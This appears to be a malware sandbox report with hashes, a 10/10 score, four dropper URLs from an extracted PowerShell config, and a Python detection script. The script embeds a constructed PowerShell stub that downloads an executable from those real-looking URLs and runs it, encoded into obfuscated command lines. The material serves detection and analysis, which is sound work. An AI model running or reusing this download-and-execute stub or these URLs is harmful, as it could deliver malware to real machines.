General

  • Target

    580f0c6436b66bf1d241b60b377c3e48_JaffaCakes118

  • Size

    105KB

  • Sample

    240519-cnywxadc3v

  • MD5

    580f0c6436b66bf1d241b60b377c3e48

  • SHA1

    199ef855f5657e16b781e6ab7ce5b6adfbc0c9aa

  • SHA256

    65df22d8324ac4ec988abbc319b2dcbdbe7da062b2ad006dde21270c8ba11c46

  • SHA512

    aa15696dfd9dcb1bcc65ba4014925f5b8d438930a88594021ce8ecd5d2307b3becf69975a1e8e147b29f1f93b5c49157a3ad42251c3df647ad443ff71cd5e286

  • SSDEEP

    3072:IMIqkaybokSjZTZjU+0cK05KlwMZ5jtG4zL:IMHVyb3CZ535KnpG4zL

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Status

    Deobfuscated

  • URLs (exe.dropper)

exe.dropper

http://rickzandvoort.nl/iAsylSE/

exe.dropper

http://littlepicture.de/fjsN/

exe.dropper

http://di2media.nl/downloader/G4h8/

exe.dropper

http://getzendiner.com/kB3RzYg/

Targets

    • Target

      XY-7751895

    • Size

      194KB

    • MD5

      4f09e96c4b23820b6d3dfdd2381b8a1e

    • SHA1

      c18e1141e40e6561b8b13a9c59f9afb480f190c1

    • SHA256

      ea036a4e07795cc164463e195031d10c130a6ee7176aee37002890c913c1f5dc

    • SHA512

      d0f4a87010534fa38523ad1f82ca54cfeacaf07f292d1d1b2c90f5b6197b3f1199414153c80056fead62c3511ff385786415d8384028219f6ba385e2c877c144

    • SSDEEP

      3072:gNYW/Ok6ZOZykI27dRbiJp9XOTXp3naXCLeTWk15YeZc721h:a2k6ZOZt7dRbi8TXp3uCyTZ/pZc721h

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
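The three signatures above describe one process chain: an Office parent spawning a script host, a caret-obfuscated cmd.exe command line, and a blocklisted process reaching out to the exe.dropper URLs from the extracted ps1 config. The following Python is an added example, not part of this sandbox report or its tooling, that runs that detection logic over constructed Sysmon-style process-creation events. Only the four URLs come from the config above; the events, the encoded PowerShell stub, the parent/child process lists and the obfuscation threshold are assumptions built for illustration.

```python
import base64
import re
from dataclasses import dataclass

# URLs from the extracted ps1 config (exe.dropper) in the report above.
CONFIG_URLS = {
    "http://rickzandvoort.nl/iAsylSE/",
    "http://littlepicture.de/fjsN/",
    "http://di2media.nl/downloader/G4h8/",
    "http://getzendiner.com/kB3RzYg/",
}

# Assumed process lists: document parents that should not launch script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class ProcEvent:
    """Minimal Sysmon event-ID-1 style record (ParentImage, Image, CommandLine)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def unexpected_child(ev: ProcEvent) -> bool:
    """'Process spawned unexpected child process': Office parent -> script host."""
    return basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SCRIPT_CHILDREN


def cmd_obfuscation_indicators(cmdline: str) -> int:
    """Count cheap cmd.exe obfuscation tricks: caret escapes spliced into tokens
    and %VAR:~n,m% substring expansion used to spell commands indirectly."""
    carets = cmdline.count("^")
    substr = len(re.findall(r"%[A-Za-z_]+:~-?\d+(?:,-?\d+)?%", cmdline))
    return carets + substr


def is_obfuscated_cmd(ev: ProcEvent, threshold: int = 3) -> bool:
    return basename(ev.image) == "cmd.exe" and cmd_obfuscation_indicators(ev.command_line) >= threshold


# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|encodedc|encoded|encode|encod|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)"
)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+/[^\s'\"@;)]*")


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text: str) -> set:
    return set(URL_RE.findall(text))


def analyze(events):
    """Apply the three checks and match any recovered URLs against the config."""
    report = {"unexpected_child": [], "obfuscated_cmd": [], "decoded": [], "urls": set()}
    for ev in events:
        if unexpected_child(ev):
            report["unexpected_child"].append((basename(ev.parent_image), basename(ev.image)))
        if is_obfuscated_cmd(ev):
            report["obfuscated_cmd"].append(ev.command_line)
        script = decode_encoded_command(ev.command_line)
        if script:
            report["decoded"].append(script)
            report["urls"] |= extract_urls(script)
    report["config_hits"] = report["urls"] & CONFIG_URLS
    return report


# Constructed stand-in for the ps1 dropper: a '@'-joined URL list walked until
# one download succeeds. It is an illustration, not the sample's actual script.
SAMPLE_SCRIPT = (
    "$u='http://rickzandvoort.nl/iAsylSE/@http://littlepicture.de/fjsN/@"
    "http://di2media.nl/downloader/G4h8/@http://getzendiner.com/kB3RzYg/'.Split('@');"
    "$p=$env:TEMP+'\\a.exe';foreach($x in $u){try{(New-Object Net.WebClient)"
    ".DownloadFile($x,$p);Start-Process $p;break}catch{}}"
)
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")


def sample_events():
    """Constructed process-creation events, not real telemetry from this sample."""
    return [
        ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                  r"C:\Windows\System32\cmd.exe",
                  "cmd /c p^o^w^e^r^s^h^e^l^l -w hidden -e " + ENCODED),
        ProcEvent(r"C:\Windows\System32\cmd.exe",
                  r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  "powershell -w hidden -e " + ENCODED),
        ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ]


if __name__ == "__main__":
    for key, value in analyze(sample_events()).items():
        print(key, value)
```

The decoded script is searched for URLs rather than the raw command line because the caret-spliced cmd.exe line and the base64 blob hide them from a plain string match; the hits against CONFIG_URLS are what turn a generic "script host spawned by Office" alert into a confirmed match for this dropper.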

MITRE ATT&CK Enterprise v15

Tasks